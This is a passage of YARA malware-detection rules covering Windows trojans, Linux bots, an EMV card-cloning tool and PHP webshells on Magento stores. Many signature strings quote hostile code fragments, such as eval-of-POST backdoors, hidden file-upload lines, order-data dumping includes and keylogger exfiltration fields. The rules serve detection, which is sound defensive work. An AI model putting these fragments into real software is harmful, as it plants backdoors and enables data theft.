    description = "the backdoor registers an auto start service with the display name \"Network Access Management Agent\" pointing to the dll netfilter.dll. This is accomplished without notifying the user via the sysprep UAC bypass method."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4673"
    $data1 = "Security"
    $data2 = "SeCreateGlobalPrivilege"
    $data3 = "Windows\\System32\\sysprep\\sysprep.exe" nocase
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data4 = "Windows\\System32\\sysprep\\sysprep.exe" nocase
    $type2 = "Service Control Manager"
    $eventid2 = "7036"
    $data5 = "Network Access Management Agent"
    $data6 = "running"
    $type3 = "Service Control Manager"
    $eventid3 = "7045"
    $data7 = "Network Access Management Agent"
    $data8 = "user mode service"
    $data9 = "auto start"
  condition:
    all of them
}

rule KINS_dropper : dropper {
  meta:
    author = "AlienVault Labs aortega@alienvault.com"
    description = "Match protocol, process injects and windows exploit present in KINS dropper"
    reference = "http://goo.gl/arPhm3"
  strings:
    $n1 = "tid=%d&ta=%s-%x" fullword
    $n2 = "fid=%d" fullword
    $n3 = "%[^.].%[^(](%[^)])" fullword
    $i0 = "%s [%s %d] 77 %s"
    $i01 = "Global\\%s%x"
    $i1 = "Inject::InjectProcessByName()"
    $i2 = "Inject::CopyImageToProcess()"
    $i3 = "Inject::InjectProcess()"
    $i4 = "Inject::InjectImageToProcess()"
    $i5 = "Drop::InjectStartThread()"
    $uac1 = "ExploitMS10_092"
    $uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
    $uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
  condition:
    2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
}

rule KINS_DLL_zeus {
  meta:
    author = "AlienVault Labs aortega@alienvault.com"
    description = "Match default bot in KINS leaked dropper, Zeus"
    reference = "http://goo.gl/arPhm3"
  strings:
    $n1 = "%BOTID%" fullword
    $n2 = "%opensocks%" fullword
    $n3 = "%openvnc%" fullword
    $n4 = /Global\\(s|v)_ev/ fullword
    $s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
    $s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
    $s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
    $s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
    $s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
  condition:
    all of ($n*) and 1 of ($s*)
}

rule KelihosHlux {
  meta:
    author = "@malpush"
    maltype = "KelihosHlux"
    description = "http://malwared.ru"
    date = "22/02/2014"
  strings:
    $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 }
  condition:
    $KelihosHlux_HexString
}

rule MALW_KeyBase {
  meta:
    description = "Identifies KeyBase aka Kibex."
    author = "@bartblaze"
    date = "2019-02"
    tlp = "White"
  strings:
    $s1 = " End:]" ascii wide
    $s2 = "Keystrokes typed:" ascii wide
    $s3 = "Machine Time:" ascii wide
    $s4 = "Text:" ascii wide
    $s5 = "Time:" ascii wide
    $s6 = "Window title:" ascii wide
    $x1 = "&application=" ascii wide
    $x2 = "&clipboardtext=" ascii wide
    $x3 = "&keystrokestyped=" ascii wide
    $x4 = "&link=" ascii wide
    $x5 = "&username=" ascii wide
    $x6 = "&windowtitle=" ascii wide
    $x7 = "=drowssap&" ascii wide
    $x8 = "=emitenihcam&" ascii wide
  condition:
    uint16(0) == 23117 and (5 of ($s*) or 6 of ($x*) or (4 of ($s*) and 4 of ($x*)))
}

rule korlia {
  meta:
    author = "Nick Hoffman"
    company = "Morphick"
    reference = "http://www.morphick.com/resources/lab-blog/curious-korlia"
    information = "korlia malware found in apt dump"
  strings:
    $a = { B2 ?? 8A 86 98 40 00 71 BF 98 40 00 71 32 C2 83 C9 FF 88 86 98 40 00 71 33 C0 46 F2 AE F7 D1 49 3B F1 }
    $b = { B3 ?? ?? ?? 8A 8A 28 50 40 00 BF 28 50 40 00 32 CB 33 C0 88 8A 28 50 40 00 83 C9 FF 42 F2 AE F7 D1 49 3B D1 }
    $c = { 8A 0C 28 80 F1 ?? 88 0C 28 8B 4C 24 14 40 3B C1 }
    $d = { 00 62 69 73 6F 6E 61 6C 00 }
  condition:
    any of them
}

rule Korplug_FAST {
  meta:
    description = "Rule to detect Korplug/PlugX FAST variant"
    author = "Florian Roth"
    date = "2015-08-20"
    hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
  strings:
    $x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" ascii fullword
    $a1 = "ShadowPlay" ascii fullword
    $s1 = "%s\\rundll32.exe \"%s\"," ascii fullword
    $s2 = "nvdisps.dll" ascii fullword
    $s3 = "%snvdisps.dll" ascii fullword
    $s4 = "\\winhlp32.exe" ascii fullword
    $s5 = "nvdisps_user.dat" ascii fullword
    $s6 = "%snvdisps_user.dat" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and ($x1 or ($a1 and 1 of ($s*)) or 4 of ($s*))
}

rule Korplug {
  meta:
    maltype = "Korplug Backdoor"
    author = "https://github.com/reed1713"
    reference = "http://www.symantec.com/connect/blogs/new-sample-backdoorkorplug-signed-stolen-certificate"
    description = "IOC looks for events associated with the KORPLUG Backdoor linked to the recent operation greedy wonk activity."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "ProgramData\\RasTls\\RasTls.exe"
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "ProgramData\\RasTls\\rundll32.exe"
    $type2 = "Microsoft-Windows-Security-Auditing"
    $eventid2 = "4688"
    $data2 = "ProgramData\\RasTls\\svchost.exe"
  condition:
    all of them
}

rule Kovter {
  meta:
    maltype = "Kovter"
    reference = "http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE-%E2%80%93-A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE"
    date = "9-19-2016"
    description = "fileless malware"
  strings:
    $type = "Microsoft-Windows-Security-Auditing" ascii wide
    $eventid = "4688" ascii wide
    $data = "Windows\\System32\\regsvr32.exe" ascii wide
    $type1 = "Microsoft-Windows-Security-Auditing" ascii wide
    $eventid1 = "4689" ascii wide
    $data1 = "Windows\\System32\\mshta.exe" ascii wide
    $type2 = "Microsoft-Windows-Security-Auditing" ascii wide
    $eventid2 = "4689" ascii wide
    $data2 = "Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ascii wide
    $type3 = "Microsoft-Windows-Security-Auditing" ascii wide
    $eventid3 = "4689" ascii wide
    $data3 = "Windows\\System32\\wbem\\WmiPrvSE.exe" ascii wide
  condition:
    all of them
}

rule Kraken_Bot_Sample : bot {
  meta:
    description = "Kraken Bot Sample - file inf.bin"
    author = "Florian Roth"
    reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
    date = "2015-05-07"
    hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
    score = 90
  strings:
    $s2 = "%s=?getname" ascii fullword
    $s4 = "&COMPUTER=^" ascii fullword
    $s5 = "xJWFwcGRhdGElAA=" ascii fullword
    $s8 = "JVdJTkRJUi" ascii fullword
    $s20 = "btcplug" ascii fullword
  condition:
    uint16(0) == 23117 and all of them
}

rule Kwampirs {
  meta:
    copyright = "Symantec"
    reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
    family = "Kwampirs"
    description = "Kwampirs dropper and main payload components"
  strings:
    $pubkey = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 }
    $network_xor_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 }
    $decrypt_string = { 85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74 4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9 40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB 74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38 40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3 32 C0 C3 }
    $init_strings = { 55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00 00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8 B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02 10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02 10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00 00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06 }
  condition:
    2 of them
}

rule lateral_movement {
  meta:
    date = "3/12/2014"
    author = "https://github.com/reed1713"
    description = "methodology sig looking for signs of lateral movement"
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "PsExec.exe"
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "Windows\\System32\\net.exe"
    $type2 = "Microsoft-Windows-Security-Auditing"
    $eventid2 = "4688"
    $data2 = "Windows\\System32\\at.exe"
  condition:
    ($type and $eventid and $data) or ($type1 and $eventid1 and $data1) or ($type2 and $eventid2 and $data2)
}

rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
  meta:
    description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
    author = "Florian Roth / improved by kbandla"
    reference = "https://twitter.com/4nc4p/status/568325493558272000"
    date = "2015/02/19"
    hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
    hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
    hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
    hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
  strings:
    $mz = { 4D 5A }
    $s2 = "Invalid key length used to initialize BlowFish." ascii fullword
    $s3 = "GetPCProxyHandler" ascii fullword
    $s4 = "StartPCProxy" ascii fullword
    $s5 = "SetPCProxyHandler" ascii fullword
  condition:
    ($mz at 0) and filesize < 2097152 and all of ($s*)
}

rule LinuxBew : MALW {
  meta:
    description = "Linux.Bew Backdoor"
    author = "Joan Soriano / @w0lfvan"
    date = "2017-07-10"
    version = "1.0"
    MD5 = "27d857e12b9be5d43f935b8cc86eaabf"
    SHA256 = "80c4d1a1ef433ac44c4fe72e6ca42395261fbca36eff243b07438263a1b1cf06"
  strings:
    $a = "src/secp256k1.c"
    $b = "hfir.u230.org"
    $c = "tempfile-x11session"
  condition:
    all of them
}

rule LinuxHelios : MALW {
  meta:
    description = "Linux.Helios"
    author = "Joan Soriano / @w0lfvan"
    date = "2017-10-19"
    version = "1.0"
    MD5 = "1a35193f3761662a9a1bd38b66327f49"
    SHA256 = "72c2e804f185bef777e854fe86cff3e86f00290f32ae8b3cb56deedf201f1719"
  strings:
    $a = "LIKE A GOD!!! IP:%s User:%s Pass:%s"
    $b = "smack"
    $c = "PEACE OUT IMMA DUP\n"
  condition:
    all of them
}

private rule is_elf {
  strings:
    $header = { 7F 45 4C 46 }
  condition:
    $header at 0
}

rule moose {
  meta:
    Author = "Thomas Dupuy"
    Date = "2015/04/21"
    Description = "Linux/Moose malware"
    Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf"
    Source = "https://github.com/eset/malware-ioc/"
    Contact = "github@eset.com"
    License = "BSD 2-Clause"
  strings:
    $s0 = "Status: OK"
    $s1 = "--scrypt"
    $s2 = "stratum+tcp://"
    $s3 = "cmd.so"
    $s4 = "/Challenge"
    $s7 = "processor"
    $s9 = "cpu model"
    $s21 = "password is wrong"
    $s22 = "password:"
    $s23 = "uthentication failed"
    $s24 = "sh"
    $s25 = "ps"
    $s26 = "echo -n -e "
    $s27 = "chmod"
    $s28 = "elan2"
    $s29 = "elan3"
    $s30 = "chmod: not found"
    $s31 = "cat /proc/cpuinfo"
    $s32 = "/proc/%s/cmdline"
    $s33 = "kill %s"
  condition:
    is_elf and all of them
}

rule lost_door : Trojan {
  meta:
    author = "Kevin Falcoz"
    date = "23/02/2013"
    description = "Lost Door"
  strings:
    $signature1 = { 45 44 49 54 5F 53 45 52 56 45 52 }
  condition:
    $signature1
}

rule LuaBot : MALW {
  meta:
    description = "LuaBot"
    author = "Joan Soriano / @joanbtl"
    date = "2017-06-07"
    version = "1.0"
    MD5 = "9df3372f058874fa964548cbb74c74bf"
    SHA1 = "89226865501ee7d399354656d870b4a9c02db1d3"
    ref1 = "http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html"
  strings:
    $a = "LUA_PATH"
    $b = "Hi. Happy reversing, you can mail me: luabot@yandex.ru"
    $c = "/tmp/lua_XXXXXX"
    $d = "NOTIFY"
    $e = "UPDATE"
  condition:
    all of them
}

rule LuckyCatCode : LuckyCat Family {
  meta:
    description = "LuckyCat code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
    $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
    $commonletters = { B? 63 B? 61 B? 73 B? 65 }
  condition:
    $xordecrypt or ($dll and $commonletters)
}

rule MSILStealer {
  meta:
    description = "Detects strings from C#/VB Stealers and QuasarRat"
    reference = "https://github.com/quasar/QuasarRAT"
    author = "https://github.com/hwvs"
    last_modified = "2019-11-21"
  strings:
    $ = "Firefox does not have any profiles, has it ever been launched?" ascii wide
    $ = "Firefox is not installed, or the install path could not be located" ascii wide
    $ = "No installs of firefox recorded in its key." ascii wide
    $ = "{0}\\\\FileZilla\\\\recentservers.xml" ascii wide
    $ = "{1}{0}Cookie Name: {2}{0}Value: {3}{0}Path" ascii wide
    $ = "[PRIVATE KEY LOCATION: \\\"{0}\\\"]" ascii wide
  condition:
    1 of them
}

rule MacControlCode : MacControl Family {
  meta:
    description = "MacControl code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-17"
  strings:
    $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
    $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
    $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
    $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
    $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
  condition:
    all of ($L4*) or $GEThgif
}

rule MacControlStrings : MacControl Family {
  meta:
    description = "MacControl Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-17"
  strings:
    $ = "HTTPHeadGet"
    $ = "/Library/launched"
    $ = "My connect error with no ip!"
    $ = "Send File is Failed"
    $ = "****************************You Have got it!****************************"
  condition:
    any of them
}

rule MacControl : Family {
  meta:
    description = "MacControl"
    author = "Seth Hardy"
    last_modified = "2014-06-16"
  condition:
    MacControlCode or MacControlStrings
}

rule MacGyverCap : MacGyver {
  meta:
    description = "Generic rule for MacGyver.cap"
    author = "xylitol@temari.fr"
    date = "2021-05-11"
    reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf"
    hash1 = "9dc70002e82c78ee34c813597925c6cf8aa8d68b7e9ce5bcc70ea9bcab9dbf4a"
  strings:
    $string1 = "src/MacGyver/javacard/Header.cap" ascii wide
    $string2 = "src/MacGyver/javacard/Directory.cap" ascii wide
    $string3 = "src/MacGyver/javacard/Applet.cap" ascii wide
    $string4 = "src/MacGyver/javacard/Import.cap" ascii wide
    $string5 = "src/MacGyver/javacard/ConstantPool.cap" ascii wide
    $string6 = "src/MacGyver/javacard/Class.cap" ascii wide
    $string7 = "src/MacGyver/javacard/Method.cap" ascii wide
  condition:
    all of them
}

rule MacGyverCapInstaller : MacGyvercap Installer {
  meta:
    description = "Generic rule for Hacktool:Win32/EMVSoft who install MacGyver.cap"
    author = "xylitol@temari.fr"
    date = "2021-05-11"
    reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf"
    hash1 = "bb828eb0bbebabbcb51f490f4a0c08dd798b1f350dddddb6c00abcb6f750069f"
    hash2 = "04f0c9904675c7cf80ff1962bec5ef465ccf8c29e668f3158ec262414a6cc6eb"
    hash3 = "7335cd56a9ac08c200cca7e25b939e9c4ffa4d508207e68bee01904bf20a6528"
    hash4 = "af542ccb415647dbd80df902858a3d150a85f37992a35f29999eed76ac01a12b"
    hash5 = "247484124f4879bfacaae73ea32267e2c1e89773986df70a5f3456b1fb944c58"
    hash6 = "1cc8a2f3ce12f4b8356bda8b4aaf61d510d1078112af1c14cf4583090e062fbe"
    hash7 = "c23411deeec790e2dba37f4c49c7ecac3c867b7012431c9281ed748519eda65c"
    hash8 = "c0d11ed2eed0fef8d2f53920a1e12f667e03eafdb2d2941473d120e9e6f0e657"
    hash9 = "1ecfd3755eba578108363c0705c6ec205972080739ed0fbd17439f8139ba7e08"
    hash10 = "87678c6dcf0065ffc487a284b9f79bd8c0815c5c621fc92f83df24393bfcc660"
  strings:
    $string1 = "delete -AID 315041592e5359532e4444463031" ascii wide
    $string2 = "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" ascii wide
    $string3 = "-mac_key 404142434445464748494a4b4c4d4e4f" ascii wide
    $string4 = "-enc_key 404142434445464748494a4b4c4d4e4f" ascii wide
  condition:
    all of them
}

rule Madness : DoS {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    date = "2014-01-15"
    description = "Identify Madness Pro DDoS Malware"
    source = "https://github.com/arbor/yara/blob/master/madness.yara"
  strings:
    $ua1 = "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE"
    $ua2 = "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ=="
    $str1 = "document.cookie=" fullword
    $str2 = "[\"cookie\",\"" fullword
    $str3 = "\"realauth=" fullword
    $str4 = "\"location\"];" fullword
    $str5 = "d3Rm" fullword
    $str6 = "ZXhl" fullword
  condition:
    all of them
}

rule dump_sales_quote_payment {
  strings:
    $ = "include '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();"
  condition:
    any of them
}

rule dump_sales_order {
  strings:
    $ = "../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')"
  condition:
    any of them
}

rule md5_64651cede2467fdeb1b3b7e6ff3f81cb {
  strings:
    $ = "rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9"
  condition:
    any of them
}

rule md5_6bf4910b01aa4f296e590b75a3d25642 {
  strings:
    $ = "base64_decode('b25lcGFnZXxnY19hZG1pbg==')"
  condition:
    any of them
}

rule fopo_webshell {
  strings:
    $ = "DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0"
    $ = "U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4c"
    $ = "rb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCt"
  condition:
    any of them
}

rule eval_post {
  strings:
    $ = "eval(base64_decode($_POST"
    $ = "eval($undecode($tongji))"
    $ = "eval($_POST"
  condition:
    any of them
}

rule spam_mailer {
  strings:
    $ = "<strong>WwW.Zone-Org</strong>"
    $ = "echo eval(urldecode("
  condition:
    any of them
}

rule md5_0105d05660329704bdb0ecd3fd3a473b {
  strings:
    $ = /\)\s*\)\s*\{\s*eval\s*\(\s*\$\{/
  condition:
    any of them
}

rule md5_0b1bfb0bdc7e017baccd05c6af6943ea {
  strings:
    $ = /eval\([\w\d]+\(\$[\w\d]+, \$[\w\d]+\)\);/
  condition:
    any of them
}

rule md5_2495b460f28f45b40d92da406be15627 {
  strings:
    $ = "$dez = $pwddir.\"/\".$real;copy($uploaded, $dez);"
  condition:
    any of them
}

rule md5_2c37d90dd2c9c743c273cb955dd83ef6 {
  strings:
    $ = "@$_($_REQUEST['"
  condition:
    any of them
}

rule md5_3ccdd51fe616c08daafd601589182d38 {
  strings:
    $ = "eval(xxtea_decrypt"
  condition:
    any of them
}

rule md5_4b69af81b89ba444204680d506a8e0a1 {
  strings:
    $ = "** Scam Redirector"
  condition:
    any of them
}

rule md5_71a7c769e644d8cf3cf32419239212c7 {
  strings:
    $ = /\$GLOBALS\['[\w\d]+'\]\(\$GLOBALS\['[\w\d]+'\]/
  condition:
    any of them
}

rule md5_825a3b2a6abbe6abcdeda64a73416b3d {
  strings:
    $ = /[o0O]{3}\("fsockopen"\)/
  condition:
    any of them
}

rule md5_87cf8209494eedd936b28ff620e28780 {
  strings:
    $ = "curl_close($cu);eval($o);};die();"
  condition:
    any of them
}

rule md5_9b59cb5b557e46e1487ef891cedaccf7 {
  strings:
    $jpg = { FF D8 FF E0 ?? ?? 4A 46 49 46 00 01 }
    $php = "<?php"
  condition:
    ($jpg at 0) and $php
}

rule md5_c647e85ad77fd9971ba709a08566935d {
  strings:
    $ = "fopen(\"cache.php\", \"w+\")"
  condition:
    any of them
}

rule md5_fb9e35bf367a106d18eb6aa0fe406437 {
  strings:
    $ = "0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js"
  condition:
    any of them
}

rule md5_8e5f7f6523891a5dcefcbb1a79e5bbe9 {
  strings:
    $ = "if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}"
  condition:
    any of them
}

rule indoexploit_autoexploiter {
  strings:
    $ = "echo \"IndoXploit - Auto Xploiter\""
  condition:
    any of them
}

rule eval_base64_decode_a {
  strings:
    $ = "eval(base64_decode($a));"
  condition:
    any of them
}

rule obfuscated_eval {
  strings:
    $ = /\\x65\s*\\x76\s*\\x61\s*\\x6C/
    $ = "\"/.*/e\""
  condition:
    any of them
}

rule md5_50be694a82a8653fa8b31d049aac721a {
  strings:
    $ = "(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))"
  condition:
    any of them
}

rule md5_ab63230ee24a988a4a9245c2456e4874 {
  strings:
    $ = "eval(gzinflate(base64_decode(str_rot13(strrev("
  condition:
    any of them
}

rule md5_b579bff90970ec58862ea8c26014d643 {
  strings:
    $ = /<Files [^>]+.(jpg|png|gif)>\s*ForceType application\/x-httpd-php/
  condition:
    any of them
}

rule md5_d30b23d1224438518d18e90c218d7c8b {
  strings:
    $ = "attribute_code=0x70617373776f72645f68617368"
  condition:
    any of them
}

rule md5_24f2df1b9d49cfb02d8954b08dba471f {
  strings:
    $ = "))unlink('../media/catalog/category/'.basename($"
  condition:
    any of them
}

rule base64_hidden_in_image {
  strings:
    $ = /JPEG-1\.1[a-zA-Z0-9\-\/]{32}/
  condition:
    any of them
}

rule hide_data_in_jpeg {
  strings:
    $ = /file_put_contents\(\$.{2,3},'JPEG-1\.1'\.base64_encode/
  condition:
    any of them
}

rule hidden_file_upload_in_503 {
  strings:
    $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/
  condition:
    any of them
}

rule md5_fd141197c89d27b30821f3de8627ac38 {
  strings:
    $ = "if(isset($_GET['do'])){$g0='adminhtml/default/default/images'"
  condition:
    any of them
}

rule visbot {
  strings:
    $ = "stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==false"
    $ = "stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')"
  condition:
    any of them
}

rule md5_39ca2651740c2cef91eb82161575348b {
  strings:
    $ = /if\(md5\(@\$_COOKIE\[..\]\)=='.{32}'\) \(\$_=@\$_REQUEST\[.\]\).@\$_\(\$_REQUEST\[.\]\);/
  condition:
    any of them
}

rule md5_4c4b3d4ba5bce7191a5138efa2468679 {
  strings:
    $ = "<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$"
    $ = "$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'"
  condition:
    any of them
}

rule md5_6eb201737a6ef3c4880ae0b8983398a9 {
  strings:
    $ = "if(md5(@$_COOKIE[qz])=="
    $ = "($_=@$_REQUEST[q]).@$_($_REQUEST[z]);"
  condition:
    all of them
}

rule md5_d201d61510f7889f1a47257d52b15fa2 {
  strings:
    $ = "@eval(stripslashes($_REQUEST[q]));"
  condition:
    any of them
}

rule md5_06e3ed58854daeacf1ed82c56a883b04 {
  strings:
    $ = "$log_entry = serialize($ARINFO)"
  condition:
    any of them
}

rule md5_28690a72362e021f65bb74eecc54255e {
  strings:
    $ = "curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));"
  condition:
    any of them
}

rule overwrite_globals_hack {
  strings:
    $ = /\$GLOBALS\['[^']{,20}'\]=Array\(/
  condition:
    any of them
}

rule md5_4adef02197f50b9cc6918aa06132b2f6 {
  strings:
    $ = /\{\s*eval\s*\(\s*\$.{1,5}\s*\(\$\{\s*\$.{1,5}\s*\}\[\s*'.{1,10}'\s*\]\s*\)\s*\);\}/
  condition:
    any of them
}

rule obfuscated_globals {
  strings:
    $ = /\$GLOBALS\['.{1,10}'\] = "\\x/
  condition:
    any of them
}

rule ld_preload_backdoor {
  strings:
